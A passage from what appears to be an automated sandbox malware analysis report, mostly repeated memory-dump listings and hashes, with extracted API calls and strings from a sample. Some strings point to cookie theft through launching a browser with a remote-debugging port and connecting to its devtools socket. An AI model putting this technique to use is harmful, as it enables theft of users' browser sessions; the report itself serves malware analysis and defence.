                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                        • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                        • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                        • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                        • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                        • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                        • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcatA.KERNEL32(?,Cookies), ref: 0041C8FB
                                                                                                                                                                        • lstrcatA.KERNEL32(?,0067CC49), ref: 0041C92E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,0067CC4C), ref: 0041C979
                                                                                                                                                                        • lstrcatA.KERNEL32(?,.txt), ref: 0041C9C4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat
                                                                                                                                                                        • String ID: .txt$Cookies
                                                                                                                                                                        • API String ID: 4038537762-474470879
                                                                                                                                                                        • Opcode ID: 5a69b92d21b9110e19577aac633a2116fd3e8a6647154e17db158134b7705218
                                                                                                                                                                        • Instruction ID: 91129cc135b6de1bd884046890de669bd94a0d0b4a39d456f35227959ca6c7b2
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a69b92d21b9110e19577aac633a2116fd3e8a6647154e17db158134b7705218
                                                                                                                                                                        • Instruction Fuzzy Hash: BC5183B6A00115AFCB04DF98DD81AD9B3B4FF58310B084479E906D3361FBB8AA59CF55
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0041F88A
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0041F8B3
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0041F8D1
                                                                                                                                                                        • lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 0041F904
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$memset
                                                                                                                                                                        • String ID: --remote-debugging-port=9223 --profile-directory="$ 0
                                                                                                                                                                        • API String ID: 2788080104-1375269121
                                                                                                                                                                        • Opcode ID: 6fe66ccf17b5f2372aacb9bc4733db90d8f29e2b90b15169104d88f3493ba66a
                                                                                                                                                                        • Instruction ID: 371a5831eea4a37533a13f2d53e422aecd75df1e672aac2beebf4d7c28b1b7a3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fe66ccf17b5f2372aacb9bc4733db90d8f29e2b90b15169104d88f3493ba66a
                                                                                                                                                                        • Instruction Fuzzy Hash: 41316B76A002049FCB14DF68DC91BA977F4FB89704F04447AE909D7320EBB0AE44CB96
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3722407311-0
                                                                                                                                                                        • Opcode ID: 3bf3ba5641bcf99497e469fec77b724b2c10feb8ef39c834a77696430b12b83d
                                                                                                                                                                        • Instruction ID: 67b5a4a5b04daad7a95f60bd5bee8071c83f245bd0fc84978605f90964d48742
                                                                                                                                                                        • Opcode Fuzzy Hash: 3bf3ba5641bcf99497e469fec77b724b2c10feb8ef39c834a77696430b12b83d
                                                                                                                                                                        • Instruction Fuzzy Hash: 2FF14BB5A02204DFD208DF2CEDD8E29B7E5FB89304705456CED1597361EEB4E8528B2A
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3722407311-0
                                                                                                                                                                        • Opcode ID: 93f08abacc95682a9c454f0aeec93fbafce23c33d6c2ac6c23b768737a7c3e7a
                                                                                                                                                                        • Instruction ID: 2d8285d9dab4c637f8c7953bcd4f462bcb5e2ae0e6670f6db3990a7f1b9a1ef9
                                                                                                                                                                        • Opcode Fuzzy Hash: 93f08abacc95682a9c454f0aeec93fbafce23c33d6c2ac6c23b768737a7c3e7a
                                                                                                                                                                        • Instruction Fuzzy Hash: EAC14D75B02208DFD208DF2CEDC8E2977E5FB893047040568ED55D7361EEB4E8568B2A
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00442CA8
                                                                                                                                                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00442CF1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                                                                                        • API String ID: 190572456-1775429166
                                                                                                                                                                        • Opcode ID: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                        • Instruction ID: 99a9e5799e649aa26cca8c53ff1b95307459894a29596d3904e707583eccb788
                                                                                                                                                                        • Opcode Fuzzy Hash: fabe7de7e6f85eda5daa03ada1acf9803514b4439227e1eaed320f7146cb866f
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A516EB9681141AFCB86DF54EC99811BBBABB4C35431600ADE9758B370F7F1AC08DB19
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                        • API String ID: 2221118986-2676143373
                                                                                                                                                                        • Opcode ID: a5bc6d2918a5f7fd23756f2bb3c9a5397500d935ddbf7d4f28cbaec1daba04e9
                                                                                                                                                                        • Instruction ID: 0dc4e084bfb38d858107b4969df691fc809c4bc6fe7224c3fbc1b472bd57c37f
                                                                                                                                                                        • Opcode Fuzzy Hash: a5bc6d2918a5f7fd23756f2bb3c9a5397500d935ddbf7d4f28cbaec1daba04e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 89319AB2700150AFC704DB59DCD1EBE37AEEBC871470C4029E40AD3366FAB4A959C759
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
